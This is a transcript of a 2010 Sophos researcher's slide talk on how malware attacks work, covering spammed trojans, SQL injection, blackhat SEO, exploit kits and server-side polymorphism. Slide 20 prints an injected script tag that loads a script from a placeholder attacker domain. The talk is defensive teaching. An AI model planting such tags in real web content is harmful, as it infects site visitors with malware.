Anatomy of attack – the way of malware - PowerPoint PPT Presentation

anatomy of attack the way of malware n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Anatomy of attack – the way of malware PowerPoint Presentation
Download Presentation
Anatomy of attack – the way of malware

play fullscreen
1 / 86
Anatomy of attack – the way of malware
131 Views
Download Presentation
badu
Download Presentation

Anatomy of attack – the way of malware

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Anatomy of attack – the way of malware Vanja Svajcer Principal Researcher – Sophos Zagreb, 12svibnja2010

  2. What do SophosLabs do? • Collect threats • Analyze and classify • Create detection and cleanup • Publish updates and information • R & D • More details later

  3. SophosLabs at the core

  4. Anatomy of attack • Setting the scene • Malware • Attack techniques • Analysis process & tools • Protection technology

  5. Malware types • Virus • Trojan • Worm

  6. Who used to write viruses? No “standard” virus writer, no “standard” motivation. Schoolkids Undergraduates Post-graduates IT Professionals Generally blokes but not A/V companies

  7. Who writes malware today? Rarely see viruses but they are making a comeback It is about money It is criminal in its origins ( There are still some spotty teenagers out there …)

  8. APT • Advanced Persistent Threat • Fashionable term for “targeted malware” • Small size (around 100k) and specialised • No packing • Looks like legitimate Windows file • Data exfiltration • Difficult to remove

  9. Email threats • The latter half of 2008 saw adramatic rise in emailattachment malware • 2009 has seen this trendcontinue, several families being aggressivelymass-spammed • Same old social engineering tactics • UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets etc etc

  10. Top spammed malware (2009) • Dominated by key malware families • Bredo • Waled • Simple butstill working!

  11. Social Engineering – Bredo Mal/Bredo • Same campaign may involve numerous “different” attachments

  12. Social Engineering – Zbot (aka Zeus) Mal/Zbot

  13. BredovsZbot • Competition between the bots!!! • Bredo attempting to disable any installed Zbot • Reminiscent of the NetskyvsBagle wars from years ago!!!

  14. Email threats • Global spam traps to track spam • USA relays more spam than any other single country • Compromised computers not only spread spam, but distribute malware and launch DDoS attacks

  15. Web predominant • 99% percent of infected systems legitimate, compromised sites • Attack sites • Botnet C&C using HTTP • Attacks still often begin with a spammed out email

  16. Web 2.0 Application Attacks

  17. Step 1: Redirect from compromised sites Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  18. Compromising hosts

  19. SQL injection DB DB DB Malicious SQLinjection • Hacker uses tool to identify pages potentially vulnerable to SQL injection • Sends malicious HTTP request (Demo)

  20. SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js • SQL injection causes databases to become peppered with malicious script tags • Result is that pages on the web server built from data retrieved from the database also contain malicious script tags

  21. SQL injection • User browses site • Malicious script tag silently loads script from remote server • Victim is infected with malware:Asprox trojan

  22. Demo SQLi + XSS

  23. Newly infected web pages – April 2010

  24. Step 2: Further redirects Compromised web sites Attacker-controlledredirects Payload

  25. SEO poisoning • Search for popular keywords

  26. Blackhat SEO

  27. Blackhat SEO

  28. Demo Blackhat SEO

  29. Visibility – sites hosting SEO kits

  30. Step 3: Load content from the attack site Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  31. Web Attacks Built using purchased kit MPack, IcePack, GPack,Neosploit, Eleonore, Yes Management console Phishing Discovered: Oct 19th2009 • Country Hit rate: • France – 4% • US – 17% • GB – 3% • Germany – 6%

  32. Web Attacks Per-browser breakdown! Server-sidepolymorphism • Hit rate: • MSIE – 12% • FireFox – 1% • Opera – 5%

  33. Polymorphism

  34. Polymorphism

  35. Polymorphism

  36. Polymorphism

  37. Polymorphism

  38. Polymorphic malware weakness • Poly engine part of the code • Can be reversed by persistent researchers • Must be decrypted in memory • Emulate the code until the invariant is found • Detection can be based on the decryption loop

  39. Server side polymorphism

  40. Server side polymorphism

  41. Server side polymorphism

  42. Server side polymorphism

  43. Demo SSP

  44. Step 4: Hit the victim with exploits, infect them. Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  45. Video - scareware

  46. Troj/MacSwp

  47. Zeus (Zbot) • Information stealing malware and botnet building kit • Builder • Loader • Control panel